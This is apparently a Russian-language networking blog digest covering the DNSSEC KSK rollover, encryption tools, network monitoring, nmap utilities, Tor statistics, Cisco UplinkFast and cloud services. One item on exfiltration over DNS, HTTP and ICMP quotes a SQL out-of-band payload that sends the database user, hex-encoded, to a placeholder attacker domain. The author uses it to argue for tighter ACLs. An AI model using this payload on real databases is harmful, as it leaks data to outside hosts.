Помните в прошлом году ICANN хотела заменить мастер ключ KSK для всех DNSSEC зон, но так и не сложилось. В этом году будет попытка номер два - объявленная дата 11 Октября.

Новый ключ KSK-2017 уже давно опубликован, будет выполнена только процедура замены старого KSK-2010, на новый. По этому поводу обновили документ с объяснениями чего ожидать. Предполагают что если что и сломается то затронет минимальное количество ресурсов и пользователей.

Следить за всем процессом можно на странице данного проекта. Там же есть и расследование причин, почему в прошлом году не получилось. Безопасность как правило это лишние затраты, менять ключи необходимо, но эта такая дополнительная работа...

C CAA вроде получше, но никто не шевелился всё равно до того момента как это стало обязательным, да и стало ли?

Криптоманьяки делают своё дело - всё больше и больше инструментов которые пытаются упростить работу с шифрованием, учитывая все лучшие практики. Из совсем нового, даже ещё не выпущенного https://www.fluidkeys.com. Участвует автор бота рассылающего напоминалки о просроченных ключах. Блог и новости проекта https://www.fluidkeys.com/blog/

Если ещё не видели https://keybase.io то тоже стоит посмотреть: чат, публичное облако, хранилка ключей (в том числе и в облаке). Но по мне сыровата.

Однако до сих порт это не совсем удобно, потому что заметно. По большому счёту gpg из командной строки удобна в не меньшей степени.

Количество различных систем мониторинга сети такое, что даже имея достаточный опыт всё равно что-то большое пропускаешь.
Читаешь статью как подружить NeDi и Observium (LibreNMS) и одним махом узнаешь про NeDi, Observium и его форк LibreNMS. Теперь придётся как минимум посмотреть что это.

Большой каталог с утилитами безопасности для Linux. Присутствует небольшое описание каждой, нужные ссылки на проект, примеры исполнения.

​О, ещё один способ нумерации портов снизу вверх и слева направо - Quanta Switch. В коллекцию увиденного осталось добавить нумерацию справа - налево, мне кажется должна такая быть.

Scantron - система для управления nmap на множестве хостов, если у вас есть такая потребность иметь распределённую сеть из nmap.
А чтобы после сканирования не утонуть в логах можно воспользоваться утилитой по разбору результатов сканирования и показать только то что нужно.

Почему-то принято рисовать карту сети опираясь на L2 связность, используя CDP, LLDP. OSPF однако тоже необходима L2 связность, конечно что-то останется прозрачным, но нарисовать карту можно. Используемый инструмент ospfviz.

Когда компьютеры были разные.

В блоге APNIC статья про сервис отображающий карту "инфицированных" IP. Сам сервис https://ip.team-cymru.org (почему-то браузер ругается на сертификат, видимо слишком с безопасностью перемудрили) и он не единственный.

Из интересного - есть списки запрещённых префиксов для глобальной маршрутизации/использования (bogons) даже для IPv6 есть. Для информационных списков помимо веба есть ещё доступ по другим протоколам, как вариант DNS - больше возможностей автоматизации. Не самый уникальный ресурс, но интересный чтобы посмотреть.

TOR Project всё время как-то мимо меня проходит. Оказывается у них есть достаточно подробный сайт с глобальной статистикой и поиском https://metrics.torproject.org. Откуда, например, я узнал что внутри нашей AS есть как минимум одна TOR relay нода, так как есть поиск по ASn помимо прочего.
Или что мы третьи в мире по количеству пользователей TOR, на первом США, за нами Германия и Франция. А ещё живая карта прямо крутая.
Почему-то я считал что TOR менее публичный сервис, но нет, для любопытных глаз есть довольно много статистики и её интересно смотреть.

Просто погода: curl wttr.in или в конкретном месте curl wttr.in/Berezniki, от создателя cheat.sh.
То же веб, настоящий. Куда вся мощь современных фреймворков с адаптивным дизайном и резиновым интерфейсом ещё не добралась, и наверное это позитивный момент.
На GitHub проекта намного больше описания и параметров, достаточно полезных.

P.S. Наиболее повседневная вещь для инструмента "веб из консоли" в моей практике это curl ifconfig.io - выдаст используемый IP. Если у вас IPv6 то надо не забыть специфицировать curl -4, чтобы IPv4 получить тоже. На сайте чуть больше примеров, но всё они уже вокруг HTTP.

В 1997 году 1 Сентября был представлен nmap - статья с исходным кодом и описанием в Phrack Magazine. День знаний, символично.

Оцените костыль от Cisco. Когда срабатывает Uplinkfast в STP, CAM коммутаторов по прежнему помнит предыдущее состояние. Чтобы не ждать пока STP сойдётся стандартным способом, коммутатор который обрабатывает новое состояние начинает флудить в новый root порт кадрами в которых SRC MAC адреса из его CAM таблицы, а DST MAC - dummy multicast 0100.0ccd.cdcd. Итог, адреса переизучаются на новые порты и трафик начинает бежать быстрее чем STP обрабатает событие смены топологии.

Такое усложнение происходит почти всегда когда добавляется функционал сверху, чтобы улучшить текущее поведение (не архитектуру) и когда в архитектуре не заложено достаточно гибкости. Кстати поэтому многие протоколы так любят TLV формат.

Правильным путём пошли чуть позже в RSTP, реализовав переключение на Alternate port вместе с уведомлением об изменении топологии. Uplinkfast ушёл в прошлое, наверное. (X)STP во всех его вариантах ещё нет, а может и вообще нет, но хотя бы по умолчанию включен обычно RSTP, что не так плохо.

Оптимистичная статья-рассуждения Daniel Dib о перспективах сетевика в виртуальном мире облаков. Если вы настраиваете не только виланы на определённой модели коммутаторов то скорее всего никуда не денетесь, даже если всё уйдёт в облака. Остануться всемирные сети - WAN, тот самый Интернет, WiFi, TCP/IP.

Но с другой стороны что если не всё уйдёт в облако, а всё само станет облаком, гигантский всемирный компьютер, вместо ИнтерНет - ИнтерЭВМ. Протоколы превратятся в API межпроцессного взаимодействия и полностью уйдут программистам. То что останется внутри будет на совести вендоров, как это сейчас произошло с суперскалярной архитектурой процессоров, где даже ассемблер всего лишь небольшое подмножество доступных методов из всего набора скрытых внутри чипа. Техническое развитие движется по пути упрощения и доступности потребителю. Конечная точка - включил и всё работает сразу, даже на уровне магистралей, даже на самом низком и профессиональном уровне.

Сети становятся умнее, языки программирования становятся умнее, большая часть работы уходит к компилятору или автогенератору настроек. Тем кто их пишет (а много ли таких людей?) беспокоится конечно не стоит. Многослойная и даже супермногослойная архитектура в итоге приводит к тому что нижний слой не требует обслуживания, даже если он и сбоит то верхние слои уже давно с этим смирились и решают проблему сами. Давно ли вы измеряли сопротивление терминатора на коаксиале, а напряжение на витой паре? А зачем?

Не упускайте момент, возможно уже и не стоит учить как настраивать вилан, скоро он сам будет настроен так как надо уже на заводе.

Интересный акцент именно на свободном ПО - в Росреестре сломался Ceph (вроде бы). То что всё может сломаться не новость, даже обыденность, но со свободным ПО есть особенность - часто позвонить некому, чтобы претензию предьявить. В пресс-релизе ничего про причины нет, так что всё на уровне слухов, как TAdviser и написал.

ssh-auditor, чтобы убедиться что какой-то из пользователей не забыл поставить на вход правильный пароль.

Десяток способов как легко передать данные c заражённой машины используя обычные протоколы: DNS, HTTP, ICMP. Это всё как правило разрешено, а без DPI и анализа совершенно не будет понятно что внутри передаются какие-то чувствительные данные.
В этом нет ничего необычного или сложного - прицепил к запросу DNS кодированную строку и всё, надо лишь правильно интерпретировать с другой стороны. Но признаться я не задумывался что такие же конструкции работают внутри SQL запросов:

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(),"\n"))), '.oob.dnsattacker.com\\test.txt'));

Появился повод пересмотреть ACL и список действительно необходимого для работы серверов.

Сегодня во всех новостях, с утра даже по радио проскочило.

Яндекс запустил свое облако, с их слов стоимость виртуальной машины начинается от 220 рублей в месяц, а при первой регистрации на счёт падает 4к рублей... Надо бы попробовать между делом...

P.S. У mail ru кстати говоря есть аналогичный сервис, но их цены меня как-то не порадовали..
https://cloud.yandex.ru

IANA всё ещё доскребает по сусекам. RIPE тоже получил свои крохи, хватит на одного нового LIR по текущей политике распределения.

Книга про DNS. Не только про конкретные DNS, альтернативные в данном случае не BIND. А про то что делать и как работать с DNS в целом, на примере конкретно взятых DNS серверов.